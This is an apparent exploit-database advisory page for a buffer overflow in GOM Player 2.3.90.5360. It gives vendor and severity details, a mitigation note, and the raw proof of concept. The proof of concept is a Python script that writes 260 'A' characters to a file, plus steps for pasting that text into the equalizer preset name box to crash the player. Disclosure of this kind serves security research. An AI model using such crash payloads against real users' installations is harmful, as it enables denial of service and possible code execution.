GOM Player 2.3.90.5360 - Buffer Overflow (PoC)

vendor:

GOM Player

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

Buffer Overflow

Not provided

CWE

Product Name: GOM Player

Affected Version From: 2.3.90.5360

Affected Version To: 2.3.90.5360

Patch Exists: No

Related CWE: Not provided

CPE: Not provided

Metasploit:

Other Scripts:

Platforms Tested: Windows 11 64bit

2023

GOM Player 2.3.90.5360 – Buffer Overflow (PoC)

This is a proof-of-concept exploit for a buffer overflow vulnerability in GOM Player version 2.3.90.5360. By providing a specially crafted input, an attacker can trigger a buffer overflow and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, users are advised to update to the latest version of GOM Player and avoid opening untrusted media files.

Source

Exploit-DB raw data:

# Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 30.08.2023
# Vendor Homepage: https://www.gomlab.com
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Tested Version: 2.3.90.5360 (latest)
# Tested on: Windows 11 64bit
# Thanks to: M. Akil GÜNDOĞAN

#  - Open GOM Player
#  - Click on the gear icon above to open settings
#  - From the menu that appears, select Audio
#  - Click on Equalizer
#  - Click on the plus sign to go to the "Add EQ preset" screen
#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK
#  - Crashed!

#!/usr/bin/python

exploit = 'A' * 260

try:
    file = open("exploit.txt","w")
    file.write(exploit)
    file.close()

    print("POC is created")
except:
    print("POC is not created")